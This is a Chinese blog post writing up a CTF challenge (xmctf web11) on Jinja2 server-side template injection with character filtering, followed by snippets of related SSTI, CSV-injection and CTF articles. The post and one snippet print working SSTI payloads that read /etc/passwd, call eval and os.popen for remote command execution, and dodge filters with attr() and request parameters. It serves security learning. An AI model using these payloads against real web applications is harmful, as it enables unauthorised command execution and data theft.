xmctf web11-考核(模板注入绕过)

最新推荐文章于 2024-04-17 08:26:50 发布
最新推荐文章于 2024-04-17 08:26:50 发布
阅读量914 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/106929215
版权

web11-考核(模板注入绕过)

输入name=1发现存在回显,猜测为模板注入,经过测试发现过滤了 . _ 和一些关键字
py2模板注入常见payload
().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read()
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /").read()' )
''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()' )
过滤了.可以用getattr或者attr绕过
例如 ''.__class__可以写成 getattr('',"__class__")或者 ''|attr("__class__")
过滤了_可以用dir(0)[0][0]或者request['args']或者 request['values']绕过
因为还过滤了 args所以我们用request['values']和attr结合绕过
例如''.__class__写成 ''|attr(request['values']['x1']),然后post传入x1=__class__
最终payload?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])| attr(request['values']['x5'])| attr(request['values']['x6'])(request['values']['x7'])| attr(request['values']['x6'])(request['values']['x8'])(request['values']['x9']) }}
然后post传入x1=__class__&x2=__base__&x3=__subclasses__&x4=__init__&x5=__globals__&x6=__getitem__&x7=__builtins__&x8=eval&x9=__import__("os").popen('想要执行的命令').read()
发现在根目录下又flag但是打不开,我这里使用的base64编码绕过的
cat /fl4g|base64

yu22x
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4847
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
SSTI漏洞详解
2301_80661529的博客
03-20 1712
SSTI(Server-Side Template Injection)就是服务器端模板注入。利用该漏洞可用于直接攻击web服务器的内部。1.Smarty:Smarty是PHP语言中广泛使用的模板引擎,它提供了强大的模板分离和逻辑控制功能。2.Twig:Twig是一个现代化的PHP模板引擎,被广泛用于Symfony框架等PHP应用程序中。3.Blade:Blade是Laravel框架的默认模板引擎,它提供了简洁的语法和强大的模板继承特性。
Web 安全之 CSV 注入攻击详解
最新发布
Innocence_0的博客
04-17 1248
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至。
05-01 4141
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
CTFshow——WP(CRYPTO[11~16])
hahaha233330的博客
11-11 3421
11、crypto11 密文:a8db1d82db78ed452ba0882fb9554fc MD5解密得到flag。MD5解密 12、crypto0 密文:gmbh{ifmmp_dug} 凯撒密码解密。
JAVA解决CSV注入漏洞的代码
搬砖人生的博客
10-29 3587
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1360
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
xmctf web4-考核
羽的博客
07-07 1369
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
xmctf-web-web11-wp
居上
06-25 95
web11 后端仍然使用的是flask,然后同时也存在SSTI。但是过滤了一些字符。 经过fuzz之后发现过滤了一些字符如 . _ arg payload #get传入 ?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])|
xmctf-web-web8-wp
居上
06-25 281
web8 考点 SSTI flask 根据提示,需要以admin的方式访问flag。携带当前session访问flag不能成功的。 传参数name={{7*7}},发现是SSTI。 然后传参?name={{config}}可以查看到,secret_key 后端使用的是flash框架。 先安装pip install flask-unsign[wordlist] 。 然后在浏览器中复制当前session flask-unsign --decode --cookie "eyJ1c2VybmFtZSI
XMCTF内部赛 part1
羽的博客
07-07 2104
web3-考核 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $na
buuoj、xmctf、攻防世界刷题(web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
SSTI模板注入绕过姿势(基于Python-Jinja2)
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
CTF-web xman-2018 第八天 web 模板注入 序列化执行
iamsongyu的博客
01-05 3751
    python代码审计 php包容性更大的语言,针对web,简单一些所以大家用这个 python出现后,更加的中性一些,有更多的库,以其为技术基础的东西也很多,比如flask模板等。 企业中java多,但是不适合初学者,调用栈特别多,反序列化,表达式执行。   对于没遇到过的题目,要会收集信息,百度不行还是用谷歌。 学会用英文搜索,而且新很多,谷歌的高级技巧(定向搜索,源码搜...
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
Flask模板注入编码姿势绕过-CMCTF
as you know, nlp is fantasitc!
04-25 921
写在前面:通过这次比赛学到flask模板注入几个比较sao的绕过姿势 参考文章如下 ctf中flask的ssti xctf高校网络安全挑战赛-华为云专场的MINE2 1、参考MINE2这道题目的一些过滤方法,以及一些替代方法 2、主要是利用attr获得属性,一些其他的编码方式如十六进制编码绕过,unicode编码绕过,格式化字符串绕过以及上面图片中提到的十六进制转字符串绕过 格式化字符串绕过payload ?msg={% print(session|attr("__init__"))|attr("__
xmctf web3-考核
Sk1y的博客
08-12 144
php session工作原理,session反序列化。
TSRC挑战赛:WAF之SQL注入绕过挑战实录
weixin_30477293的博客
07-08 222
转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r、花开若相惜 来自团队:[Pax.Mac Team] 应邀参加TSRC WAF防御绕过挑战赛,由于之前曾经和Team小伙伴一起参加过安全宝WAF挑战,而且自己平时接触WAF的机会也比较多,对于WAF绕...
buuctf 刷题记录 模板注入
SopRomeo的博客
01-16 880
查看源代码发现三个txt进入的格式是这样的 把filename改为/fllllllllllllag emmmmm,点其他连个看看 有思路了重点就是求出这个cookie_secret 作为一个菜鸡,百度tornado 然后了解到了模板注入(配上网址https://www.jianshu.com/p/aef2ae0498df) render是一个类似模板的东西,可以使用不同的参数来访问网页...
ctf秀crypto部分持续更新
weixin_52450702的博客
05-15 1219
crypto1 倒序即可 倒序网站 flag{ctf.show} crypto2 flag{3e858ccd79287cfe8509f15a71b4c45d} crypto3 听说和第二个一样,但是我没搞出来 crypto4 p=447685307 q=2037 e=17 提交flag{d}即可 p,q,e,d一看就是rsa加密 首先了解一下rsa加密。 这里推荐一个rsa加解密的软件。 rsatool2 链接:https://pan.baidu.com/s/1HHXCutXjeO_CKtstVMj
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值